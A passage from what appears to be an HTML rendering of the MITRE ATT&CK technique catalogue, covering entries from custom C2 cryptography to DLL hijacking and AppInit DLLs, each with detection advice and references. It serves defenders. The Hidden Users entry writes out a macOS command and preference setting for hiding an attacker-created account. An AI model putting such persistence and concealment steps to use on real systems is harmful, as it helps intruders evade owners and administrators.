<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1123">https://attack.mitre.org/wiki/Technique/T1123</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_custom_cryptographic_protocol"><a class="anchor" href="#_custom_cryptographic_protocol"></a><a class="link" href="#_custom_cryptographic_protocol">Custom Cryptographic Protocol</a></h3>
<div class="paragraph">
<p>Adversaries may use a custom cryptographic protocol or algorithm to hide command and control traffic. A simple scheme, such as XOR-ing the plaintext with a fixed key, will produce a very weak ciphertext.</p>
</div>
<div class="paragraph">
<p>Custom encryption schemes may vary in sophistication. Analysis and reverse engineering of malware samples may be enough to discover the algorithm and encryption key used.</p>
</div>
<div class="paragraph">
<p>Some adversaries may also attempt to implement their own version of a well-known cryptographic algorithm instead of using a known implementation library, which may lead to unintentional errors.[[Citation: F-Secure Cosmicduke]]</p>
</div>
<div class="paragraph">
<p>Detection: If malware uses custom encryption with symmetric keys, it may be possible to obtain the algorithm and key from samples and use them to decode network traffic to detect malware communications signatures.[[Citation: Fidelis DarkComet]]</p>
</div>
<div class="paragraph">
<p>In general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect when communications do not follow the expected protocol behavior for the port that is being used.[[Citation: University of Birmingham C2]]</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Linux, Windows 10, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: Packet capture, Netflow/Enclave netflow, Process use of network, Malware reverse engineering, Process monitoring</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 662. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1024">https://attack.mitre.org/wiki/Technique/T1024</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.f-secure.com/documents/996508/1030745/cosmicduke%20whitepaper.pdf">https://www.f-secure.com/documents/996508/1030745/cosmicduke%20whitepaper.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf">https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fidelissecurity.com/sites/default/files/FTA%201018%20looking%20at%20the%20sky%20for%20a%20dark%20comet.pdf">https://www.fidelissecurity.com/sites/default/files/FTA%201018%20looking%20at%20the%20sky%20for%20a%20dark%20comet.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_graphical_user_interface"><a class="anchor" href="#_graphical_user_interface"></a><a class="link" href="#_graphical_user_interface">Graphical User Interface</a></h3>
<div class="paragraph">
<p>Cause a binary or script to execute based on interacting with the file through a graphical user interface (GUI) or in an interactive remote session such as Remote Desktop Protocol.</p>
</div>
<div class="paragraph">
<p>Detection: Detection of execution through the GUI will likely lead to significant false positives. Other factors should be considered to detect misuse of services that can lead to adversaries gaining access to systems through interactive remote sessions.</p>
</div>
<div class="paragraph">
<p>Unknown or unusual process launches outside of normal behavior on a particular system occurring through remote interactive sessions are suspicious. Collect and audit security logs that may indicate access to and use of [[Legitimate Credentials]] to access remote systems within the network.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10, Linux, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process monitoring, Process command-line parameters, Binary file metadata</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 663. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1061">https://attack.mitre.org/wiki/Technique/T1061</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fallback_channels"><a class="anchor" href="#_fallback_channels"></a><a class="link" href="#_fallback_channels">Fallback Channels</a></h3>
<div class="paragraph">
<p>Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.</p>
</div>
<div class="paragraph">
<p>Detection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.[[Citation: University of Birmingham C2]]</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Linux, Windows 10, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: Packet capture, Netflow/Enclave netflow, Malware reverse engineering, Process use of network, Process monitoring</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 664. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1008">https://attack.mitre.org/wiki/Technique/T1008</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf">https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_exploitation_of_vulnerability"><a class="anchor" href="#_exploitation_of_vulnerability"></a><a class="link" href="#_exploitation_of_vulnerability">Exploitation of Vulnerability</a></h3>
<div class="paragraph">
<p>Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Exploiting software vulnerabilities may allow adversaries to run a command or binary on a remote system for lateral movement, escalate a current process to a higher privilege level, or bypass security mechanisms. Exploits may also allow an adversary access to privileged accounts and credentials. One example of this is MS14-068, which can be used to forge Kerberos tickets using domain user permissions.[[Citation: Technet MS14-068]][[Citation: ADSecurity Detecting Forged Tickets]]</p>
</div>
<div class="paragraph">
<p>Detection: Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Software and operating system crash reports may contain useful contextual information about attempted exploits that correlate with other malicious activity. Exploited processes may exhibit behavior that is unusual for the specific process, such as spawning additional processes or reading and writing to files.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10, Linux, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: Windows Error Reporting, File monitoring, Process monitoring</p>
</div>
<div class="paragraph">
<p>Effective Permissions: User, Administrator, SYSTEM</p>
</div>
<div class="paragraph">
<p>Contributors: John Lambert, Microsoft Threat Intelligence Center</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 665. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1068">https://attack.mitre.org/wiki/Technique/T1068</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/security/ms14-068.aspx">https://technet.microsoft.com/en-us/library/security/ms14-068.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://adsecurity.org/?p=1515">https://adsecurity.org/?p=1515</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hidden_users"><a class="anchor" href="#_hidden_users"></a><a class="link" href="#_hidden_users">Hidden Users</a></h3>
<div class="paragraph">
<p>Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account. There is a property value in &lt;code&gt;/Library/Preferences/com.apple.loginwindow&lt;/code&gt; called &lt;code&gt;Hide500Users&lt;/code&gt; that prevents users with userIDs 500 and lower from appearing at the login screen. By using the Create Account technique with a userID under 500 and enabling this property (setting it to Yes), an adversary can hide their user accounts much more easily: &lt;code&gt;sudo dscl . -create /Users/username UniqueID 401&lt;/code&gt;[[Citation: Cybereason OSX Pirrit]].</p>
</div>
<div class="paragraph">
<p>Detection: This technique prevents the new user from showing up at the log in screen, but all of the other signs of a new user still exist. The user still gets a home directory and will appear in the authentication logs.</p>
</div>
<div class="paragraph">
<p>Platforms: MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: Authentication logs, File monitoring</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 666. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1147">https://attack.mitre.org/wiki/Technique/T1147</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.cybereason.com/research-osx-pirrit-mac-os-x-secuirty">https://www2.cybereason.com/research-osx-pirrit-mac-os-x-secuirty</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_binary_padding"><a class="anchor" href="#_binary_padding"></a><a class="link" href="#_binary_padding">Binary Padding</a></h3>
<div class="paragraph">
<p>Some security tools inspect files with static signatures to determine if they are known malicious. Adversaries may add data to files to increase the size beyond what security tools are capable of handling or to change the file hash to avoid hash-based blacklists.</p>
</div>
<div class="paragraph">
<p>Detection: Depending on the method used to pad files, a file-based signature may be capable of detecting padding using a scanning or on-access based tool.</p>
</div>
<div class="paragraph">
<p>When executed, the resulting process from padded files may also exhibit other behavior characteristics of being used to conduct an intrusion such as system and network information <a id="Discovery"></a> or [[Lateral Movement]], which could be used as event indicators that point to the source file.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10, Linux, MacOS, OS X</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 667. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1009">https://attack.mitre.org/wiki/Technique/T1009</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_login_item"><a class="anchor" href="#_login_item"></a><a class="link" href="#_login_item">Login Item</a></h3>
<div class="paragraph">
<p>MacOS provides the option to list specific applications to run when a user logs in. These applications run under the logged in user&#8217;s context, and will be started every time the user logs in. Login items installed using the Service Management Framework are not visible in the System Preferences and can only be removed by the application that created them[[Citation: Adding Login Items]]. Users have direct control over login items installed using a shared file list which are also visible in System Preferences[[Citation: Adding Login Items]]. These login items are stored in the user&#8217;s &lt;code&gt;~/Library/Preferences/&lt;/code&gt; directory in a plist file called &lt;code&gt;com.apple.loginitems.plist&lt;/code&gt;[[Citation: Methods of Mac Malware Persistence]]. Some of these applications can open visible dialogs to the user, but they dont all have to since there is an option to Hide the window. If an adversary can register their own login item or modified an existing one, then they can use it to execute their code for a persistence mechanism each time the user logs in[[Citation: Malware Persistence on OS X]][[Citation: OSX.Dok Malware]].</p>
</div>
<div class="paragraph">
<p>Detection: All the login items are viewable by going to the Apple menu &#8594; System Preferences &#8594; Users &amp; Groups &#8594; Login items. This area should be monitored and whitelisted for known good applications. Monitor process execution resulting from login actions for unusual or unknown applications.</p>
</div>
<div class="paragraph">
<p>Platforms: MacOS, OS X</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 668. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1162">https://attack.mitre.org/wiki/Technique/T1162</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/">https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLoginItems.html">https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLoginItems.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.rsaconference.com/writable/presentations/file%20upload/ht-r03-malware-persistence-on-os-x-yosemite%20final.pdf">https://www.rsaconference.com/writable/presentations/file%20upload/ht-r03-malware-persistence-on-os-x-yosemite%20final.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf">https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_redundant_access"><a class="anchor" href="#_redundant_access"></a><a class="link" href="#_redundant_access">Redundant Access</a></h3>
<div class="paragraph">
<p>Adversaries may use more than one remote access tool with varying command and control protocols as a hedge against detection. If one type of tool is detected and blocked or removed as a response but the organization did not gain a full understanding of the adversary&#8217;s tools and access, then the adversary will be able to retain access to the network. Adversaries may also attempt to gain access to Valid Accounts to use External Remote Services such as external VPNs as a way to maintain access despite interruptions to remote access tools deployed within a target network.Web Shell is one such way to maintain access to a network through an externally accessible Web server.</p>
</div>
<div class="paragraph">
<p>Detection: Existing methods of detecting remote access tools are helpful. Backup remote access tools or other access points may not have established command and control channels open during an intrusion, so the volume of data transferred may not be as high as the primary channel unless access is lost.</p>
</div>
<div class="paragraph">
<p>Detection of tools based on beacon traffic, Valid Accounts and External Remote Services to collect account use information.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10, Linux, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: Process monitoring, Process use of network, Packet capture, Network protocol analysis, File monitoring, Authentication logs, Binary file metadata</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 669. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1108">https://attack.mitre.org/wiki/Technique/T1108</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf">https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_data_encrypted"><a class="anchor" href="#_data_encrypted"></a><a class="link" href="#_data_encrypted">Data Encrypted</a></h3>
<div class="paragraph">
<p>Data is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or to make the exfiltration less conspicuous upon inspection by a defender. The encryption is performed by a utility, programming library, or custom algorithm on the data itself and is considered separate from any encryption performed by the command and control or file transfer protocol. Common file archive formats that can encrypt files are RAR and zip.</p>
</div>
<div class="paragraph">
<p>Other exfiltration techniques likely apply as well to transfer the information out of the network, such as Exfiltration Over Command and Control Channel and Exfiltration Over Alternative Protocol</p>
</div>
<div class="paragraph">
<p>Detection: Encryption software and encrypted files can be detected in many ways. Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known encryption utilities. This may yield a significant amount of benign events, depending on how systems in the environment are typically used. Often the encryption key is stated within command-line invocation of the software.</p>
</div>
<div class="paragraph">
<p>A process that loads the Windows DLL crypt32.dll may be used to perform encryption, decryption, or verification of file signatures.</p>
</div>
<div class="paragraph">
<p>Network traffic may also be analyzed for entropy to determine if encrypted data is being transmitted.[[Citation: Zhang 2013]] If the communications channel is unencrypted, encrypted files of known file types can be detected in transit during exfiltration with a network intrusion detection or data loss prevention system analyzing file headers.[[Citation: Wikipedia File Header Signatures]]</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10, Linux, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process monitoring, Process command-line parameters, Binary file metadata</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 670. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1022">https://attack.mitre.org/wiki/Technique/T1022</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.netsec.colostate.edu/" class="bare">http://www.netsec.colostate.edu/</a><sub>zhang/DetectingEncryptedBotnetTraffic.pdf[<a href="http://www.netsec.colostate.edu/" class="bare">http://www.netsec.colostate.edu/</a></sub>zhang/DetectingEncryptedBotnetTraffic.pdf]</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/List%20of%20file%20signatures">https://en.wikipedia.org/wiki/List%20of%20file%20signatures</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dll_search_order_hijacking"><a class="anchor" href="#_dll_search_order_hijacking"></a><a class="link" href="#_dll_search_order_hijacking">DLL Search Order Hijacking</a></h3>
<div class="paragraph">
<p>Windows systems use a common method to look for required DLLs to load into a program.[[Citation: Microsoft DLL Search]] Adversaries may take advantage of the Windows DLL search order and programs that ambiguously specify DLLs to gain privilege escalation and persistence.</p>
</div>
<div class="paragraph">
<p>Adversaries may perform DLL preloading, also called binary planting attacks,[[Citation: OWASP Binary Planting]] by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL.[[Citation: Microsoft 2269637]] Adversaries may use this behavior to cause the program to load a malicious DLL.</p>
</div>
<div class="paragraph">
<p>Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL to maintain persistence or privilege escalation.[[Citation: Microsoft DLL Redirection]][[Citation: Microsoft Manifests]][[Citation: Mandiant Search Order]]</p>
</div>
<div class="paragraph">
<p>If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program.</p>
</div>
<div class="paragraph">
<p>Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths. Modifications to or creation of .manifest and .local redirection files that do not correlate with software updates are suspicious. Disallow loading of remote DLLs.[[Citation: Microsoft DLL Preloading]]</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, DLL monitoring, Process monitoring, Process command-line parameters</p>
</div>
<div class="paragraph">
<p>Effective Permissions: User, Administrator, SYSTEM</p>
</div>
<div class="paragraph">
<p>Contributors: Stefan Kanthak</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 671. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1038">https://attack.mitre.org/wiki/Technique/T1038</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/en-US/library/aa375365">https://msdn.microsoft.com/en-US/library/aa375365</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.owasp.org/index.php/Binary%20planting">https://www.owasp.org/index.php/Binary%20planting</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://msdn.microsoft.com/en-US/library/ms682586">http://msdn.microsoft.com/en-US/library/ms682586</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blogs.technet.com/b/srd/archive/2010/08/23/more-information-about-dll-preloading-remote-attack-vector.aspx">http://blogs.technet.com/b/srd/archive/2010/08/23/more-information-about-dll-preloading-remote-attack-vector.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://msdn.microsoft.com/en-US/library/ms682600">http://msdn.microsoft.com/en-US/library/ms682600</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blogs.technet.com/b/msrc/archive/2010/08/21/microsoft-security-advisory-2269637-released.aspx">http://blogs.technet.com/b/msrc/archive/2010/08/21/microsoft-security-advisory-2269637-released.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.mandiant.com/blog/dll-search-order-hijacking-revisited/">https://www.mandiant.com/blog/dll-search-order-hijacking-revisited/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_data_from_network_shared_drive"><a class="anchor" href="#_data_from_network_shared_drive"></a><a class="link" href="#_data_from_network_shared_drive">Data from Network Shared Drive</a></h3>
<div class="paragraph">
<p>Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to cmd may be used to gather information.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor processes and command-line arguments for actions that could be taken to collect files from a network share. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10, Linux, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process monitoring, Process command-line parameters</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 672. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1039">https://attack.mitre.org/wiki/Technique/T1039</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_appinit_dlls"><a class="anchor" href="#_appinit_dlls"></a><a class="link" href="#_appinit_dlls">AppInit DLLs</a></h3>
<div class="paragraph">
<p>DLLs that are specified in the AppInit_DLLs value in the Registry key &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows&lt;/code&gt; are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program. This value can be abused to obtain persistence by causing a DLL to be loaded into most processes on the computer.[[Citation: AppInit Registry]]</p>
</div>
<div class="paragraph">
<p>The AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled.[[Citation: AppInit Secure Boot]]</p>
</div>
<div class="paragraph">
<p>Detection: Monitor DLL loads by processes that load user32.dll and look for DLLs that are not recognized or not normally loaded into a process. Monitor the AppInit_DLLs Registry value for modifications that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current AppInit DLLs.[[Citation: TechNet Autoruns]]</p>
</div>
<div class="paragraph">
<p>Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for [[Command and Control]], learning details about the environment through <a id="Discovery"></a>, and conducting [[Lateral Movement]].</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: Loaded DLLs, Process monitoring, Windows Registry</p>
</div>
<div class="paragraph">
<p>Effective Permissions: Administrator, SYSTEM</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 673. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1103">https://attack.mitre.org/wiki/Technique/T1103</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://support.microsoft.com/en-us/kb/197571">https://support.microsoft.com/en-us/kb/197571</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/en-us/library/dn280412">https://msdn.microsoft.com/en-us/library/dn280412</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/sysinternals/bb963902">https://technet.microsoft.com/en-us/sysinternals/bb963902</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_standard_non_application_layer_protocol"><a class="anchor" href="#_standard_non_application_layer_protocol"></a><a class="link" href="#_standard_non_application_layer_protocol">Standard Non-Application Layer Protocol</a></h3>
<div class="paragraph">
<p>Use of a standard non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.[[Citation: Wikipedia OSI]] Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), and transport layer protocols, such as the User Datagram Protocol (UDP).</p>
</div>
<div class="paragraph">
<p>ICMP communication between hosts is one example. Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts;[[Citation: Microsoft ICMP]] however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.</p>
</div>
<div class="paragraph">
<p>Detection: Analyze network traffic for ICMP messages or other protocols that contain abnormal data or are not normally seen within or exiting the network.</p>
</div>
<div class="paragraph">
<p>Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.[[Citation: University of Birmingham C2]]</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Linux, Windows 10, MacOS, OS X</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 674. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1095">https://attack.mitre.org/wiki/Technique/T1095</a></p></td>
</tr>
<tr>
